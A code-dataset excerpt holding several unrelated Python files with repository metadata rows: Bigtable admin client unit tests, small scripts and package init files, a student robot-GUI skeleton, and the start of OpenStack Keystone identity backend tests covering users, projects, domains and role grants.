description)
exception = response.exception()
assert exception.errors[0] == error
def test_get_snapshot(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
data_size_bytes = 2110122398
description = 'description-1724546052'
expected_response = {
'name': name_2,
'data_size_bytes': data_size_bytes,
'description': description
}
expected_response = table_pb2.Snapshot(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
response = client.get_snapshot(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GetSnapshotRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_snapshot_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
with pytest.raises(CustomException):
client.get_snapshot(name)
def test_list_snapshots(self):
# Setup Expected Response
next_page_token = ''
snapshots_element = {}
snapshots = [snapshots_element]
expected_response = {
'next_page_token': next_page_token,
'snapshots': snapshots
}
expected_response = bigtable_table_admin_pb2.ListSnapshotsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.cluster_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]')
paged_list_response = client.list_snapshots(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.snapshots[0] == resources[0]
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ListSnapshotsRequest(
parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_snapshots_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.cluster_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]')
paged_list_response = client.list_snapshots(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_delete_snapshot(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
client.delete_snapshot(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DeleteSnapshotRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_snapshot_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
with pytest.raises(CustomException):
client.delete_snapshot(name)
| 37.016158 | 86 | 0.661606 | 2,030 | 20,618 | 6.478818 | 0.100493 | 0.072993 | 0.033075 | 0.041515 | 0.815465 | 0.791439 | 0.755398 | 0.739431 | 0.733196 | 0.718066 | 0 | 0.023625 | 0.248618 | 20,618 | 556 | 87 | 37.082734 | 0.825329 | 0.084732 | 0 | 0.671309 | 0 | 0 | 0.076661 | 0.02023 | 0 | 0 | 0 | 0 | 0.111421 | 1 | 0.083565 | false | 0.002786 | 0.019499 | 0.002786 | 0.119777 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
be745972cf4b0503114981c8e000fb317f6ddd32 | 203 | py | Python | Python/Games/happy_birthday.py | erikhayton/Portfolio | ee1e649fe6340911968f27207ad7253d3ddc2cde | [
"MIT"
] | null | null | null | Python/Games/happy_birthday.py | erikhayton/Portfolio | ee1e649fe6340911968f27207ad7253d3ddc2cde | [
"MIT"
] | null | null | null | Python/Games/happy_birthday.py | erikhayton/Portfolio | ee1e649fe6340911968f27207ad7253d3ddc2cde | [
"MIT"
] | null | null | null | name = input("What is your name? ")
def happy_birthday():
print("Happy Birthday To You")
print("Happy Birthday To You")
print("Happy Birthday Dear" + name)
print("Happy Birthday To You") | 29 | 39 | 0.665025 | 29 | 203 | 4.62069 | 0.413793 | 0.485075 | 0.537313 | 0.447761 | 0.649254 | 0.477612 | 0.477612 | 0.477612 | 0 | 0 | 0 | 0 | 0.206897 | 203 | 7 | 40 | 29 | 0.832298 | 0 | 0 | 0.5 | 0 | 0 | 0.495098 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.166667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
be82bc6e5854a64c8783138ea6de5f5cd1b9bcd9 | 138 | py | Python | src/wildfires/dask_cx1/__init__.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | 1 | 2021-01-30T15:38:32.000Z | 2021-01-30T15:38:32.000Z | src/wildfires/dask_cx1/__init__.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | null | null | null | src/wildfires/dask_cx1/__init__.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Modules to ease Dask usage on CX1."""
from .dask_cx1 import *
from .dask_rf import *
from .dask_utils import *
| 23 | 40 | 0.666667 | 22 | 138 | 4.045455 | 0.636364 | 0.269663 | 0.314607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 0.173913 | 138 | 5 | 41 | 27.6 | 0.754386 | 0.413043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
be9383b609ee77cf3c55f2d608460b54f2bd95fa | 124 | py | Python | notecron/center/common/scheduler/__init__.py | notechats/notejob | bf12c80a08761b97cb9405afa0706ccbb413eee0 | [
"MulanPSL-1.0"
] | null | null | null | notecron/center/common/scheduler/__init__.py | notechats/notejob | bf12c80a08761b97cb9405afa0706ccbb413eee0 | [
"MulanPSL-1.0"
] | null | null | null | notecron/center/common/scheduler/__init__.py | notechats/notejob | bf12c80a08761b97cb9405afa0706ccbb413eee0 | [
"MulanPSL-1.0"
] | null | null | null | """
scheduler
"""
from .CuBackgroundScheduler import CuBackgroundScheduler
from .CuGeventScheduler import CuGeventScheduler
| 20.666667 | 56 | 0.846774 | 9 | 124 | 11.666667 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08871 | 124 | 5 | 57 | 24.8 | 0.929204 | 0.072581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fe4f6760f8abac870cab54d103307c1953a13c3d | 2,401 | py | Python | src/m2_run_this_on_laptop.py | tanzichen0403/99-CapstoneProject-201920 | 3183f502cd2689dd0ef68da1d4ef0a495a90c51c | [
"MIT"
] | null | null | null | src/m2_run_this_on_laptop.py | tanzichen0403/99-CapstoneProject-201920 | 3183f502cd2689dd0ef68da1d4ef0a495a90c51c | [
"MIT"
] | null | null | null | src/m2_run_this_on_laptop.py | tanzichen0403/99-CapstoneProject-201920 | 3183f502cd2689dd0ef68da1d4ef0a495a90c51c | [
"MIT"
] | null | null | null | """
Capstone Project. Code to run on a LAPTOP (NOT the robot).
Displays the Graphical User Interface (GUI) and communicates with the robot.
Authors: Your professors (for the framework)
and Xinlai Chen.
Winter term, 2018-2019.
"""
import mqtt_remote_method_calls as com
import tkinter
from tkinter import ttk
import shared_gui
def main():
"""
This code, which must run on a LAPTOP:
1. Constructs a GUI for my part of the Capstone Project.
2. Communicates via MQTT with the code that runs on the EV3 robot.
"""
# -------------------------------------------------------------------------
# Construct and connect the MQTT Client:
# -------------------------------------------------------------------------
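    # A minimal sketch (assumed API): the course's mqtt_remote_method_calls
    # module is expected to provide MqttClient with a connect_to_ev3 method.
    mqtt_sender = com.MqttClient()
    mqtt_sender.connect_to_ev3()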
# -------------------------------------------------------------------------
# The root TK object for the GUI:
# -------------------------------------------------------------------------
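    root = tkinter.Tk()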
# -------------------------------------------------------------------------
# The main frame, upon which the other frames are placed.
# -------------------------------------------------------------------------
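    main_frame = ttk.Frame(root, padding=10)
    main_frame.grid()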
# -------------------------------------------------------------------------
# Sub-frames for the shared GUI that the team developed:
# -------------------------------------------------------------------------
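    teleop_frame, arm_frame, control_frame = get_shared_frames(main_frame,
                                                               mqtt_sender)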
# -------------------------------------------------------------------------
# Frames that are particular to my individual contributions to the project.
# -------------------------------------------------------------------------
# TODO: Implement and call get_my_frames(...)
# -------------------------------------------------------------------------
# Grid the frames.
# -------------------------------------------------------------------------
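    grid_frames(teleop_frame, arm_frame, control_frame)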
# -------------------------------------------------------------------------
# The event loop:
# -------------------------------------------------------------------------
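    root.mainloop()
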
def get_shared_frames(main_frame, mqtt_sender):
    # Minimal sketch: the constructor names are assumed to exist in the
    # team's shared_gui module; adjust them to match its actual API.
    return (shared_gui.get_teleoperation_frame(main_frame, mqtt_sender),
            shared_gui.get_arm_frame(main_frame, mqtt_sender),
            shared_gui.get_control_frame(main_frame, mqtt_sender))
def grid_frames(teleop_frame, arm_frame, control_frame):
    # The row/column layout here is an assumption; any arrangement works.
    teleop_frame.grid(row=0, column=0)
    arm_frame.grid(row=0, column=1)
    control_frame.grid(row=1, column=0)
# -----------------------------------------------------------------------------
# Calls main to start the ball rolling.
# -----------------------------------------------------------------------------
main() | 34.797101 | 79 | 0.326947 | 169 | 2,401 | 4.56213 | 0.526627 | 0.023346 | 0.015564 | 0.031128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005371 | 0.147022 | 2,401 | 69 | 80 | 34.797101 | 0.371094 | 0.81591 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.3 | false | 0.2 | 0.4 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
fea52b8e84af7a5a3792a1336dce60d413b6c77a | 110,398 | py | Python | tests/test_backend.py | isabella232/keystone | 89d35004411e1eec9b1af97f589f06ae871aca02 | [
"Apache-2.0"
] | 6 | 2016-08-06T09:00:17.000Z | 2021-10-21T23:12:47.000Z | tests/test_backend.py | paypal/keystone | 89d35004411e1eec9b1af97f589f06ae871aca02 | [
"Apache-2.0"
] | 1 | 2021-02-23T10:29:49.000Z | 2021-02-23T10:29:49.000Z | tests/test_backend.py | isabella232/keystone | 89d35004411e1eec9b1af97f589f06ae871aca02 | [
"Apache-2.0"
] | 10 | 2016-04-25T20:10:06.000Z | 2021-06-10T15:14:19.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import default_fixtures
import uuid
import nose.exc
from keystone.catalog import core
from keystone import config
from keystone import exception
from keystone.openstack.common import timeutils
from keystone import test
CONF = config.CONF
DEFAULT_DOMAIN_ID = CONF.identity.default_domain_id
TIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
class IdentityTests(object):
def test_project_add_and_remove_user_role(self):
user_refs = self.identity_api.get_project_users(self.tenant_bar['id'])
self.assertNotIn(self.user_two['id'], [x['id'] for x in user_refs])
self.identity_api.add_role_to_user_and_project(
tenant_id=self.tenant_bar['id'],
user_id=self.user_two['id'],
role_id=self.role_other['id'])
user_refs = self.identity_api.get_project_users(self.tenant_bar['id'])
self.assertIn(self.user_two['id'], [x['id'] for x in user_refs])
self.identity_api.remove_role_from_user_and_project(
tenant_id=self.tenant_bar['id'],
user_id=self.user_two['id'],
role_id=self.role_other['id'])
user_refs = self.identity_api.get_project_users(self.tenant_bar['id'])
self.assertNotIn(self.user_two['id'], [x['id'] for x in user_refs])
def test_authenticate_bad_user(self):
self.assertRaises(AssertionError,
self.identity_api.authenticate,
user_id=uuid.uuid4().hex,
tenant_id=self.tenant_bar['id'],
password=self.user_foo['password'])
def test_authenticate_bad_password(self):
self.assertRaises(AssertionError,
self.identity_api.authenticate,
user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'],
password=uuid.uuid4().hex)
def test_authenticate_bad_project(self):
self.assertRaises(AssertionError,
self.identity_api.authenticate,
user_id=self.user_foo['id'],
tenant_id=uuid.uuid4().hex,
password=self.user_foo['password'])
def test_authenticate_no_project(self):
user_ref, tenant_ref, metadata_ref = self.identity_api.authenticate(
user_id=self.user_foo['id'],
password=self.user_foo['password'])
# NOTE(termie): the password field is left in user_foo to make
# it easier to authenticate in tests, but should
# not be returned by the api
self.user_foo.pop('password')
self.assertDictEqual(user_ref, self.user_foo)
        self.assertIsNone(tenant_ref)
        self.assertFalse(metadata_ref)
def test_authenticate(self):
user_ref, tenant_ref, metadata_ref = self.identity_api.authenticate(
user_id=self.user_sna['id'],
tenant_id=self.tenant_bar['id'],
password=self.user_sna['password'])
        # NOTE(termie): the password field is left in user_sna to make
        #               it easier to authenticate in tests, but should
        #               not be returned by the api
self.user_sna.pop('password')
self.user_sna['enabled'] = True
self.assertDictEqual(user_ref, self.user_sna)
self.assertDictEqual(tenant_ref, self.tenant_bar)
metadata_ref.pop('roles')
self.assertDictEqual(metadata_ref, self.metadata_snamtu)
def test_authenticate_role_return(self):
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_baz['id'], self.role_admin['id'])
user_ref, tenant_ref, metadata_ref = self.identity_api.authenticate(
user_id=self.user_foo['id'],
tenant_id=self.tenant_baz['id'],
password=self.user_foo['password'])
self.assertIn('roles', metadata_ref)
self.assertIn(self.role_admin['id'], metadata_ref['roles'])
def test_authenticate_no_metadata(self):
user = {
'id': 'no_meta',
'name': 'NO_META',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'no_meta2',
}
self.identity_api.create_user(user['id'], user)
self.identity_api.add_user_to_project(self.tenant_baz['id'],
user['id'])
user_ref, tenant_ref, metadata_ref = self.identity_api.authenticate(
user_id=user['id'],
tenant_id=self.tenant_baz['id'],
password=user['password'])
        # NOTE(termie): the password field is left in the user dict to make
        #               it easier to authenticate in tests, but should
        #               not be returned by the api
user.pop('password')
self.assertEquals(metadata_ref, {"roles":
[CONF.member_role_id]})
self.assertDictContainsSubset(user_ref, user)
self.assertDictEqual(tenant_ref, self.tenant_baz)
def test_password_hashed(self):
user_ref = self.identity_api._get_user(self.user_foo['id'])
self.assertNotEqual(user_ref['password'], self.user_foo['password'])
def test_get_project(self):
tenant_ref = self.identity_api.get_project(
tenant_id=self.tenant_bar['id'])
self.assertDictEqual(tenant_ref, self.tenant_bar)
def test_get_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project,
tenant_id=uuid.uuid4().hex)
def test_get_project_by_name(self):
tenant_ref = self.identity_api.get_project_by_name(
tenant_name=self.tenant_bar['name'],
domain_id=DEFAULT_DOMAIN_ID)
self.assertDictEqual(tenant_ref, self.tenant_bar)
def test_get_project_by_name_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project_by_name,
tenant_name=uuid.uuid4().hex,
domain_id=DEFAULT_DOMAIN_ID)
def test_get_project_users(self):
        user_refs = self.identity_api.get_project_users(self.tenant_baz['id'])
        user_ids = []
        for user in user_refs:
self.assertNotIn('password', user)
user_ids.append(user.get('id'))
self.assertEquals(len(user_ids), 2)
self.assertIn(self.user_two['id'], user_ids)
self.assertIn(self.user_badguy['id'], user_ids)
def test_get_project_users_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project_users,
tenant_id=uuid.uuid4().hex)
def test_get_user(self):
user_ref = self.identity_api.get_user(user_id=self.user_foo['id'])
# NOTE(termie): the password field is left in user_foo to make
# it easier to authenticate in tests, but should
# not be returned by the api
self.user_foo.pop('password')
self.assertDictEqual(user_ref, self.user_foo)
def test_get_user_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.get_user,
user_id=uuid.uuid4().hex)
def test_get_user_by_name(self):
user_ref = self.identity_api.get_user_by_name(
user_name=self.user_foo['name'],
domain_id=DEFAULT_DOMAIN_ID)
# NOTE(termie): the password field is left in user_foo to make
# it easier to authenticate in tests, but should
# not be returned by the api
self.user_foo.pop('password')
self.assertDictEqual(user_ref, self.user_foo)
def test_get_user_by_name_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.get_user_by_name,
user_name=uuid.uuid4().hex,
domain_id=DEFAULT_DOMAIN_ID)
def test_get_metadata(self):
metadata_ref = self.identity_api.get_metadata(
user_id=self.user_sna['id'],
tenant_id=self.tenant_bar['id'])
metadata_ref.pop('roles')
self.assertDictEqual(metadata_ref, self.metadata_snamtu)
def test_get_metadata_404(self):
# FIXME(dolph): these exceptions could be more specific
self.assertRaises(exception.NotFound,
self.identity_api.get_metadata,
user_id=uuid.uuid4().hex,
tenant_id=self.tenant_bar['id'])
self.assertRaises(exception.NotFound,
self.identity_api.get_metadata,
user_id=self.user_foo['id'],
tenant_id=uuid.uuid4().hex)
def test_get_role(self):
role_ref = self.identity_api.get_role(
role_id=self.role_admin['id'])
role_ref_dict = dict((x, role_ref[x]) for x in role_ref)
self.assertDictEqual(role_ref_dict, self.role_admin)
def test_get_role_404(self):
self.assertRaises(exception.RoleNotFound,
self.identity_api.get_role,
role_id=uuid.uuid4().hex)
def test_create_duplicate_role_name_fails(self):
role = {'id': 'fake1',
'name': 'fake1name'}
self.identity_api.create_role('fake1', role)
role['id'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_api.create_role,
'fake2',
role)
def test_rename_duplicate_role_name_fails(self):
role1 = {
'id': 'fake1',
'name': 'fake1name'
}
role2 = {
'id': 'fake2',
'name': 'fake2name'
}
self.identity_api.create_role('fake1', role1)
self.identity_api.create_role('fake2', role2)
role1['name'] = 'fake2name'
self.assertRaises(exception.Conflict,
self.identity_api.update_role,
'fake1',
role1)
def test_create_duplicate_user_id_fails(self):
user = {'id': 'fake1',
'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
self.identity_man.create_user({}, 'fake1', user)
user['name'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_man.create_user, {},
'fake1',
user)
def test_create_duplicate_user_name_fails(self):
user = {'id': 'fake1',
'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
self.identity_man.create_user({}, 'fake1', user)
user['id'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_man.create_user, {},
'fake2',
user)
def test_create_duplicate_user_name_in_different_domains(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
user1 = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID,
'password': uuid.uuid4().hex}
user2 = {'id': uuid.uuid4().hex,
'name': user1['name'],
'domain_id': new_domain['id'],
'password': uuid.uuid4().hex}
self.identity_man.create_user({}, user1['id'], user1)
self.identity_man.create_user({}, user2['id'], user2)
def test_move_user_between_domains(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
user = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id'],
'password': uuid.uuid4().hex}
self.identity_man.create_user({}, user['id'], user)
user['domain_id'] = domain2['id']
self.identity_api.update_user(user['id'], user)
def test_move_user_between_domains_with_clashing_names_fails(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
# First, create a user in domain1
user1 = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id'],
'password': uuid.uuid4().hex}
self.identity_man.create_user({}, user1['id'], user1)
# Now create a user in domain2 with a potentially clashing
# name - which should work since we have domain separation
user2 = {'id': uuid.uuid4().hex,
'name': user1['name'],
'domain_id': domain2['id'],
'password': uuid.uuid4().hex}
self.identity_man.create_user({}, user2['id'], user2)
# Now try and move user1 into the 2nd domain - which should
# fail since the names clash
user1['domain_id'] = domain2['id']
self.assertRaises(exception.Conflict,
self.identity_api.update_user,
user1['id'],
user1)
def test_rename_duplicate_user_name_fails(self):
user1 = {'id': 'fake1',
'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
user2 = {'id': 'fake2',
'name': 'fake2',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
self.identity_api.create_user('fake1', user1)
self.identity_api.create_user('fake2', user2)
user2['name'] = 'fake1'
self.assertRaises(exception.Conflict,
self.identity_api.update_user,
'fake2',
user2)
def test_update_user_id_fails(self):
user = {'id': 'fake1',
'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
self.identity_api.create_user('fake1', user)
user['id'] = 'fake2'
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
user_ref = self.identity_api.get_user('fake1')
self.assertEqual(user_ref['id'], 'fake1')
self.assertRaises(exception.UserNotFound,
self.identity_api.get_user,
'fake2')
def test_create_duplicate_project_id_fails(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['name'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_man.create_project, {},
'fake1',
tenant)
def test_create_duplicate_project_name_fails(self):
tenant = {'id': 'fake1', 'name': 'fake',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['id'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_man.create_project, {},
'fake1',
tenant)
def test_create_duplicate_project_name_in_different_domains(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
tenant1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID}
tenant2 = {'id': uuid.uuid4().hex, 'name': tenant1['name'],
'domain_id': new_domain['id']}
self.identity_man.create_project({}, tenant1['id'], tenant1)
self.identity_man.create_project({}, tenant2['id'], tenant2)
def test_move_project_between_domains(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
project = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project['id'], project)
project['domain_id'] = domain2['id']
self.identity_api.update_project(project['id'], project)
def test_move_project_between_domains_with_clashing_names_fails(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
# First, create a project in domain1
project1 = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
# Now create a project in domain2 with a potentially clashing
# name - which should work since we have domain separation
project2 = {'id': uuid.uuid4().hex,
'name': project1['name'],
'domain_id': domain2['id']}
self.identity_man.create_project({}, project2['id'], project2)
# Now try and move project1 into the 2nd domain - which should
# fail since the names clash
project1['domain_id'] = domain2['id']
self.assertRaises(exception.Conflict,
self.identity_api.update_project,
project1['id'],
project1)
def test_rename_duplicate_project_name_fails(self):
tenant1 = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
tenant2 = {'id': 'fake2', 'name': 'fake2',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant1)
self.identity_man.create_project({}, 'fake2', tenant2)
tenant2['name'] = 'fake1'
self.assertRaises(exception.Error,
self.identity_api.update_project,
'fake2',
tenant2)
def test_update_project_id_does_nothing(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_api.create_project('fake1', tenant)
tenant['id'] = 'fake2'
self.identity_api.update_project('fake1', tenant)
tenant_ref = self.identity_api.get_project('fake1')
self.assertEqual(tenant_ref['id'], 'fake1')
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project,
'fake2')
def test_add_duplicate_role_grant(self):
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertNotIn(self.role_admin['id'], roles_ref)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], self.role_admin['id'])
self.assertRaises(exception.Conflict,
self.identity_api.add_role_to_user_and_project,
self.user_foo['id'],
self.tenant_bar['id'],
self.role_admin['id'])
def test_get_role_by_user_and_project(self):
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertNotIn(self.role_admin['id'], roles_ref)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], self.role_admin['id'])
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertIn(self.role_admin['id'], roles_ref)
self.assertNotIn('member', roles_ref)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], 'member')
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertIn(self.role_admin['id'], roles_ref)
self.assertIn('member', roles_ref)
def test_get_roles_for_user_and_domain(self):
""" Test for getting roles for user on a domain.
Test Plan:
- Create a domain, with 2 users
- Check no roles yet exit
- Give user1 two roles on the domain, user2 one role
- Get roles on user1 and the domain - maybe sure we only
get back the 2 roles on user1
- Delete both roles from user1
- Check we get no roles back for user1 on domain
"""
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_api.create_user(new_user1['id'], new_user1)
new_user2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_api.create_user(new_user2['id'], new_user2)
roles_ref = self.identity_api.list_grants(
user_id=new_user1['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
# Now create the grants (roles are defined in default_fixtures)
self.identity_api.create_grant(user_id=new_user1['id'],
domain_id=new_domain['id'],
role_id='member')
self.identity_api.create_grant(user_id=new_user1['id'],
domain_id=new_domain['id'],
role_id='other')
self.identity_api.create_grant(user_id=new_user2['id'],
domain_id=new_domain['id'],
role_id='admin')
# Read back the roles for user1 on domain
roles_ids = self.identity_api.get_roles_for_user_and_domain(
new_user1['id'], new_domain['id'])
self.assertEqual(len(roles_ids), 2)
self.assertIn(self.role_member['id'], roles_ids)
self.assertIn(self.role_other['id'], roles_ids)
# Now delete both grants for user1
self.identity_api.delete_grant(user_id=new_user1['id'],
domain_id=new_domain['id'],
role_id='member')
self.identity_api.delete_grant(user_id=new_user1['id'],
domain_id=new_domain['id'],
role_id='other')
roles_ref = self.identity_api.list_grants(
user_id=new_user1['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
